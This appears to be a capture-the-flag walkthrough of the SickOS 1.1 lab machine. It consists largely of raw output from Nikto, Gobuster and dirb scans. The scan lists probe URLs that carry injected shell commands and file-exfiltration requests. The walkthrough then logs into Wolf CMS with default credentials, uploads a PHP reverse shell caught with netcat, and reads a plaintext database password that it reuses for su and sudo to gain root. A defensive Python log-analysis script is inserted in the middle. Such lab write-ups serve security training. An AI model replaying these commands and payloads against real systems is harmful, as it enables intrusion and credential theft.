+ /cgis/rwwwshell.pl: THC reverse www shell
+ /cgi-win/rwwwshell.pl: THC reverse www shell
+ /webcgi/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ /cgibin/photo/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more.
+ OSVDB-35876: /agentadmin.php: Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.
+ /servlet/SessionManager: IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.
+ /ip.txt: This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.
+ OSVDB-59536: /logicworks.ini: web-erp 0.1.4 and earlier allow .ini files to be read remotely.
+ OSVDB-2881: /pp.php?action=login: Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.
+ /isapi/count.pl?: AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.
+ OSVDB-113: /ncl_items.html: This may allow attackers to reconfigure your Tektronix printer.
+ /pvote/ch_info.php?newpass=password&confirm=password%20: PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-2225: /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin: paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.
+ OSVDB-3092: /shopadmin.asp: VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.
+ OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
+ OSVDB-568: /blahb.ida: Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. http://www.microsoft.com/technet/security/bulletin/MS01-033.asp.
+ OSVDB-578: /level/24/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/38/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/63/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-578: /level/71/exec//show: CISCO HTTP service allows remote execution of commands
+ OSVDB-13405: /WS_FTP.LOG: WS_FTP.LOG file was found. It may contain sensitive information.
+ OSVDB-3093: /cgi-915/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-win/ccbill-local.pl?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcgi/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cgi-bin/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/ccbill-local.cgi?cmd=MENU: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-1642: /cgi-win/gbook/gbook.cgi?_MAILTO=xx;ls: gbook.cgi allows command execution.
+ OSVDB-7161: /scripts/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7161: /cgi-perl/bslist.cgi?email=x;ls: BSList allows command execution.
+ OSVDB-7162: /webcgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-915/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-7162: /cgi-bin-sdb/bsguest.cgi?email=x;ls: BSGuest allows command execution.
+ OSVDB-136: /cgi/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-win/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /fcgi-bin/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-perl/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-136: /cgi-bin-sdb/phf: This allows attackers to read arbitrary files on the system and perhaps execute commands.
+ OSVDB-228: /cgi/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-win/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /fcgi-bin/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-exe/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-228: /cgi-perl/upload.cgi: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.
+ OSVDB-127: /cgi/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /cgis/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-127: /scripts/nph-publish.cgi: This CGI may allow attackers to execute arbitrary commands on the server.
+ OSVDB-128: /cgibin/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-win/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-128: /cgi-bin-sdb/nph-test-cgi: This CGI lets attackers get a directory listing of the CGI directory.
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-2717: /cgi-bin/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2717: /cgi-perl/include/new-visitor.inc.php: Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.
+ OSVDB-2735: /cgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /cgibin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /scripts/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /fcgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-279: /cgi-915/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgis/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-perl/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /fcgi-bin/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated:  2 error(s) and 589 item(s) reported on remote host
+ End Time:           2017-01-11 21:10:07 (GMT2) (246 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

SingleScan is testing URL: 'http://192.168.1.9:80/'
[19:18:55] [OUT] Inspecting URL 'http://192.168.1.9:80/'...

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.9:80/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wfuzz/wordlist/general/big.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Proxy        : http://192.168.1.9:3128/
[+] Expanded     : true
=====================================================
http://192.168.1.9:80/cgi-bin/ (Status: 403)
http://192.168.1.9:80/connect (Status: 200)
http://192.168.1.9:80/index (Status: 200)
=====================================================

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 21:18:58 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
PROXY: 192.168.1.9:3128

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.9:80/ ----
+ http://192.168.1.9:80/cgi-bin/ (CODE:403|SIZE:287)
+ http://192.168.1.9:80/connect (CODE:200|SIZE:109)
+ http://192.168.1.9:80/index (CODE:200|SIZE:21)
+ http://192.168.1.9:80/robots (CODE:200|SIZE:45)
+ http://192.168.1.9:80/robots.txt (CODE:200|SIZE:45)
+ http://192.168.1.9:80/server-status (CODE:403|SIZE:292)
                                                                                                                                                                                                               
-----------------
END_TIME: Wed Jan 11 21:19:13 2017
DOWNLOADED: 20458 - FOUND: 6
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.1.9:80
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request  
==================================================================


Fatal exception: FUZZ words and number of payloads do not match!

+ http://192.168.1.9:80/cgi-bin/

status
{ "uptime": " 02:28:29 up 2:37, 0 users, load average: 0.00, 0.01, 0.03", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

+ http://192.168.1.9:80/server-status
Forbidden

You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 192.168.1.9 Port 80

+ http://192.168.1.9:80/connect
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

http://192.168.1.9/index
<h1>
BLEHHH!!!
</h1>

http://192.168.1.9:80/robots
http://192.168.1.9/robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

http://192.168.1.9/wolfcms/

http://192.168.1.9/wolfcms/?/admin/login
Login: admin:admin
Version: Wolf CMS 0.8.2

Upload a reverse shell; it is then served from:
http://192.168.1.9/wolfcms/public/php-reverse-shell.php

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 45100
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 03:18:00 up  3:27,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@SickOs:/$


www-data@SickOs:/etc/apache2/sites-available$ cat default
cat default
<VirtualHost *:80>
ServerAdmin webmaster@localhost

DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>
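Added example (not part of the original write-up or the author's tools): a defender-side check over the access log that the vhost above writes in combined format. It flags a script answered with 200 from /wolfcms/public/ and a client that walks many mostly-missing paths, as the dirb and gobuster runs did here. The log lines, the 192.168.1.50 visitor, the thresholds and the treatment of /wolfcms/public/ as an upload-only directory are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" format, as named by the CustomLog line in the vhost above.
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"'
)
# Assumption: /wolfcms/public/ should only ever serve static uploads.
UPLOAD_PREFIX = "/wolfcms/public/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|pl|py|cgi|sh)$", re.I)
ENUM_MIN_PATHS = 5     # hypothetical thresholds, tune per site
ENUM_MISS_RATIO = 0.6

# Constructed sample lines (not the target's real access.log). Assumed here:
# requests relayed through the proxy on 192.168.1.9:3128 are logged with the
# proxy's address as client; 192.168.1.50 is a constructed ordinary visitor.
SAMPLE_LOG = """
192.168.1.9 - - [11/Jan/2017:21:18:58 +0200] "GET /cgi-bin/ HTTP/1.1" 403 287 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:18:58 +0200] "GET /admin HTTP/1.1" 404 498 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:18:59 +0200] "GET /backup HTTP/1.1" 404 499 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:18:59 +0200] "GET /phpmyadmin HTTP/1.1" 404 503 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:19:00 +0200] "GET /test HTTP/1.1" 404 497 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:19:01 +0200] "GET /robots.txt HTTP/1.1" 200 45 "-" "-"
192.168.1.50 - - [11/Jan/2017:21:20:10 +0200] "GET /wolfcms/ HTTP/1.1" 200 3975 "-" "-"
192.168.1.50 - - [11/Jan/2017:21:20:11 +0200] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 812 "-" "-"
192.168.1.9 - - [11/Jan/2017:21:25:40 +0200] "GET /wolfcms/public/php-reverse-shell.php HTTP/1.1" 200 94 "-" "-"
"""


def analyse(log_text):
    """Return (rule, client, detail) tuples for the two patterns on this page."""
    findings = []
    clients = defaultdict(lambda: {"paths": set(), "total": 0, "miss": 0})
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # blank line or not in combined format
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        c = clients[m["host"]]
        c["paths"].add(path)
        c["total"] += 1
        c["miss"] += status in (403, 404)
        # A script answered with 200 from the upload directory: likely web shell.
        if path.startswith(UPLOAD_PREFIX) and SCRIPT_EXT.search(path) and status == 200:
            findings.append(("script-in-upload-dir", m["host"], path))
    # Many distinct paths, mostly refused or missing: wordlist-style enumeration.
    for host, c in clients.items():
        if len(c["paths"]) >= ENUM_MIN_PATHS and c["miss"] / c["total"] >= ENUM_MISS_RATIO:
            findings.append(("path-enumeration", host, len(c["paths"])))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```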
www-data@SickOs:/etc/apache2/sites-available$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py
index.php
robots.txt
wolfcms
www-data@SickOs:/var/www$ cd wolfcms
cd wolfcms
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');


www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/var/www/wolfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
<lfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su sickos
su sickos
Password: john@123
sickos@SickOs:/var/www/wolfcms$ cd ~
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit

sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -la
ls -la
total 40
drwx------  3 root root 4096 Dec  6  2015 .
drwxr-xr-x 22 root root 4096 Sep 22  2015 ..
-rw-r--r--  1 root root   96 Dec  6  2015 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3724 Dec  6  2015 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep 22  2015 .cache
-rw-------  1 root root   22 Dec  5  2015 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5230 Dec  6  2015 .viminfo
root@SickOs:~# cat *.txt
cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


Regards,
Yuriy Stanchev/URIX